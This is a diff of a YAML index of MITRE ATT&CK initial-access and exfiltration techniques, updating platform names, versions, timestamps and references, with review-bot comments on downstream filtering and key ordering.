x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566.002:
technique:
- modified: '2024-04-15T23:51:25.037Z'
+ modified: '2024-10-15T16:06:32.591Z'
name: 'Phishing: Spearphishing Link'
description: |-
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -59399,10 +60328,10 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '2.6'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
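Review bot: this hunk swaps `Office 365` and `Google Workspace` for `Identity Provider` and `Office Suite` in `x_mitre_platforms`, and the same substitution (plus dropping `Azure AD`) recurs for T1078.001, T1199, T1566, T1078, T1078.004, T1567 and T1567.004 below. Anything downstream that selects techniques by the old platform strings, including any per-platform index that filters on `Office 365` or `Google Workspace`, will silently return an empty set after this change; those consumers should be updated in the same PR. The accompanying version bump (`'2.6'` to `'2.7'`) is consistent with this being the upstream platform consolidation rather than a local edit.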
@@ -59419,7 +60348,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: CISA IDN ST05-016
description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -59458,12 +60387,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.002
atomic_tests: []
T1566.001:
technique:
- modified: '2024-01-31T14:09:27.066Z'
+ modified: '2024-10-15T16:42:01.552Z'
name: 'Phishing: Spearphishing Attachment'
description: "Adversaries may send spearphishing emails with a malicious attachment
in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -59525,7 +60453,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Unit 42 DarkHydrus July 2018
description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
Targets Middle East Government. Retrieved August 2, 2018.
@@ -59542,7 +60470,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.001
atomic_tests: []
T1195.003:
@@ -59572,7 +60499,7 @@ initial-access:
the adversary a high degree of control over the system. Hardware backdoors
may be inserted into various devices, such as servers, workstations, network
infrastructure, or peripherals.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:05:10.755Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Hardware Supply Chain
x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -59586,7 +60513,6 @@ initial-access:
- 'Sensor Health: Host Status'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1091:
technique:
@@ -59649,12 +60575,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1195:
technique:
- modified: '2024-02-26T14:23:37.009Z'
+ modified: '2024-10-04T11:17:00.778Z'
name: Supply Chain Compromise
description: "Adversaries may manipulate products or product delivery mechanisms
prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -59729,7 +60654,7 @@ initial-access:
description: Schneider Electric. (2018, August 24). Security Notification
– USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
Retrieved May 28, 2019.
- url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+ url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
- source_name: Trendmicro NPM Compromise
description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -59743,19 +60668,18 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1195
atomic_tests: []
T1190:
technique:
- modified: '2023-11-28T21:27:35.373Z'
+ modified: '2024-09-24T14:33:53.433Z'
name: Exploit Public-Facing Application
description: |-
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
- Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+ Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
- If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+ If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
@@ -59781,7 +60705,7 @@ initial-access:
- Linux
- macOS
- Containers
- x_mitre_version: '2.5'
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -59836,7 +60760,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1659:
technique:
@@ -59899,11 +60822,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -59918,6 +60840,7 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -59926,18 +60849,18 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -59969,14 +60892,11 @@ initial-access:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1199:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:08:39.968Z'
name: Trusted Relationship
description: |-
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
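Review bot: the `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` lines removed at the top of this hunk are not gone, they were re-emitted higher in the same T1078.001 object (after `phase_name: initial-access` and after `x_mitre_is_subtechnique: true`), so the change is pure key reordering. The order is not even consistent within this patch: T1199 below keeps both keys at the bottom, and T1078 removes `x_mitre_attack_spec_version` from the top and re-adds it at the bottom. Emitting each technique mapping with sorted keys (or a fixed key order) in the generator would make future ATT&CK refreshes diff only on real changes and make hunks like this one reviewable.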
@@ -59987,6 +60907,11 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_contributors:
+ - Praetorian
+ - ExtraHop
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: Establish monitoring for activity conducted by second and
third party providers and other trusted entities that may be leveraged as
a means to gain access to the network. Depending on the type of relationship,
@@ -59995,22 +60920,18 @@ initial-access:
is based on IT services. Adversaries may be able to act quickly towards an
objective, so proper monitoring for behavior related to Credential Access,
Lateral Movement, and Collection will be important to detect the intrusion.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Linux
- macOS
- - Office 365
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '2.3'
- x_mitre_contributors:
- - Praetorian
- - ExtraHop
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Logon Session: Logon Session Metadata'
@@ -60035,36 +60956,19 @@ initial-access:
url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566:
technique:
- modified: '2024-03-01T16:56:32.245Z'
+ modified: '2024-10-07T15:00:19.668Z'
name: Phishing
- description: "Adversaries may send phishing messages to gain access to victim
- systems. All forms of phishing are electronically delivered social engineering.
- Phishing can be targeted, known as spearphishing. In spearphishing, a specific
- individual, company, or industry will be targeted by the adversary. More generally,
- adversaries can conduct non-targeted phishing, such as in mass malware spam
- campaigns.\n\nAdversaries may send victims emails containing malicious attachments
- or links, typically to execute malicious code on victim systems. Phishing
- may also be conducted via third-party services, like social media platforms.
- Phishing may also involve social engineering techniques, such as posing as
- a trusted source, as well as evasive techniques such as removing or manipulating
- emails or metadata/headers from compromised accounts being abused to send
- messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
- Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
- Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
- the identity of the sender which can be used to fool both the human recipient
- as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
- may also receive phishing messages that instruct them to call a phone number
- where they are directed to visit a malicious URL, download malware,(Citation:
- sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
- or install adversary-accessible remote management tools onto their computer
- (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
- Unit42 Luna Moth)"
+ description: |-
+ Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+ Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+ Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
@@ -60093,9 +60997,9 @@ initial-access:
- macOS
- Windows
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '2.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Flow'
@@ -60113,7 +61017,11 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: phishing-krebs
+ description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+ Prey on Your Curiosity. Retrieved September 27, 2024.'
+ url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
- source_name: CISA Remote Monitoring and Management Software
description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
and Management Software. Retrieved February 2, 2023.
@@ -60151,11 +61059,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -60172,7 +61079,6 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -60182,7 +61088,7 @@ initial-access:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -60191,19 +61097,17 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -60251,11 +61155,12 @@ initial-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1566.004:
technique:
- modified: '2023-10-15T11:49:40.990Z'
+ modified: '2024-10-15T16:06:47.134Z'
name: Spearphishing Voice
description: |-
Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -60275,10 +61180,8 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- - SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
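Review bot: unlike the other platform hunks in this section, this one removes `SaaS` outright (`- - SaaS`) and adds only `Identity Provider`, and T1189 below does the same. Worth checking against the upstream T1566.004 object that SaaS was really dropped in the `'1.0'` to `'1.1'` revision and that the generator is not mapping SaaS onto Identity Provider, because any SaaS-scoped index would lose these two techniques with no other signal that something changed.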
@@ -60311,7 +61214,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1195.002:
technique:
@@ -60350,7 +61252,7 @@ initial-access:
may be specific to a desired victim set or may be distributed to a broad set
of consumers but only move on to additional tactics on specific victims.(Citation:
Avast CCleaner3 2018)(Citation: Command Five SK 2011) "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:04:36.636Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Software Supply Chain
x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -60365,7 +61267,6 @@ initial-access:
- 'File: File Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -60445,11 +61346,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1200:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.332Z'
name: Hardware Additions
description: |-
Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -60505,11 +61405,10 @@ initial-access:
url: https://www.youtube.com/watch?v=fXthwl6ShOg
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1189:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:55:47.494Z'
name: Drive-by Compromise
description: "Adversaries may gain access to a system through a user visiting
a website over the normal course of browsing. With this technique, the user's
@@ -60570,8 +61469,8 @@ initial-access:
- Windows
- Linux
- macOS
- - SaaS
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
@@ -60599,13 +61498,12 @@ initial-access:
url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -60645,8 +61543,10 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -60654,13 +61554,13 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -60691,14 +61591,11 @@ initial-access:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1566.003:
technique:
- modified: '2024-01-31T14:15:55.690Z'
+ modified: '2024-10-15T15:16:30.272Z'
name: Spearphishing via Service
description: "Adversaries may send spearphishing messages via third-party services
in an attempt to gain access to victim systems. Spearphishing via service
@@ -60765,11 +61662,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -60821,15 +61717,14 @@ initial-access:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
exfiltration:
T1567:
technique:
- modified: '2023-09-05T15:00:36.471Z'
+ modified: '2024-10-15T15:57:40.951Z'
name: Exfiltration Over Web Service
description: |-
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -60853,10 +61748,9 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
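Review bot: the `- Office 365` and `- Google Workspace` platform entries for T1567 are collapsed into a single `- Office Suite` entry (with `x_mitre_version` bumped from 1.3 to 1.4), and the same substitution recurs below for T1567.004, T1048 and T1537. Anything that selects techniques by the literal platform string, including whatever builds the per-platform indexes such as google-workspace-index.yaml, now has to match `Office Suite` as well, otherwise these techniques silently drop out of the Google Workspace and Office 365 views. A grep for the two old strings in the index generator before merging would settle it.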
@@ -60875,13 +61769,12 @@ exfiltration:
external_id: T1567
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.004:
technique:
- modified: '2023-10-12T05:22:59.079Z'
+ modified: '2024-10-15T15:57:55.928Z'
name: Exfiltration Over Webhook
description: "Adversaries may exfiltrate data to a webhook endpoint rather than
over their primary command and control channel. Webhooks are simple mechanisms
@@ -60920,9 +61813,8 @@ exfiltration:
- macOS
- Linux
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
@@ -60972,7 +61864,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1029:
technique:
@@ -60992,7 +61883,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1029
external_id: T1029
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:26:48.769Z'
name: Scheduled Transfer
description: |-
Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
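Review bot: `modified` for T1029 moves backwards in time, from `'2021-04-29T14:49:39.188Z'` to `'2020-03-28T00:26:48.769Z'`, and the same backwards move appears further down for T1011.001, T1048.001, T1048.002, T1041, T1052.001, T1030, T1052 and T1048.003. Every old value in those entries ends in the identical `.188Z` fraction, which looks like a bulk-assigned stamp rather than a real upstream timestamp, so the new earlier values are plausibly the authoritative STIX `modified` fields; please state that in the PR description, because a consumer doing a "what changed since date X" comparison would otherwise treat these entries as untouched.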
@@ -61012,8 +61903,6 @@ exfiltration:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1011:
technique:
